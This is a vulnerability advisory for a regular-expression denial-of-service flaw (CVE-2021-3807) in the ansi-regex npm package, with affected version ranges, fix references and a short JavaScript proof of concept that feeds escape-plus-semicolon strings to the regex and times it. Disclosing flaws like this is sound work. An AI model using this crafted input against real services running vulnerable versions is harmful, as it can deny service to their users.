ansi-regex is vulnerable to Inefficient Regular Expression Complexity which could lead to a denial of service when parsing invalid ANSI escape codes.
Proof of Concept
import ansiRegex from 'ansi-regex';
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = "\u001B["+";".repeat(i*10000);
ansiRegex().test(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
The ReDOS is mainly due to the sub-patterns [[\\]()#;?]*
and (?:;[-a-zA-Z\\d\\/#&.:=?%@~_]*)*
CPE | Name | Operator | Version |
---|---|---|---|
ansi-regex | ge | 5.0.0 | |
ansi-regex | lt | 6.0.1 | |
ansi-regex | lt | 4.1.1 | |
ansi-regex | ge | 4.0.0 | |
ansi-regex | ge | 3.0.0 | |
ansi-regex | ge | 6.0.0 | |
ansi-regex | lt | 5.0.1 | |
ansi-regex | lt | 3.0.1 |
app.snyk.io/vuln/SNYK-JS-ANSIREGEX-1583908
github.com/chalk/ansi-regex
github.com/chalk/ansi-regex/commit/419250fa510bf31b4cc672e76537a64f9332e1f1
github.com/chalk/ansi-regex/commit/75a657da7af875b2e2724fd6331bf0a4b23d3c9a
github.com/chalk/ansi-regex/commit/8d1d7cdb586269882c4bdc1b7325d0c58c8f76f9
github.com/chalk/ansi-regex/commit/c3c0b3f2736b9c01feec0fef33980c43720dcde8
github.com/chalk/ansi-regex/issues/38#issuecomment-924086311
github.com/chalk/ansi-regex/issues/38#issuecomment-925924774
github.com/chalk/ansi-regex/releases/tag/v6.0.1
huntr.dev/bounties/5b3cf33b-ede0-4398-9974-800876dfd994
nvd.nist.gov/vuln/detail/CVE-2021-3807
security.netapp.com/advisory/ntap-20221014-0002
www.oracle.com/security-alerts/cpuapr2022.html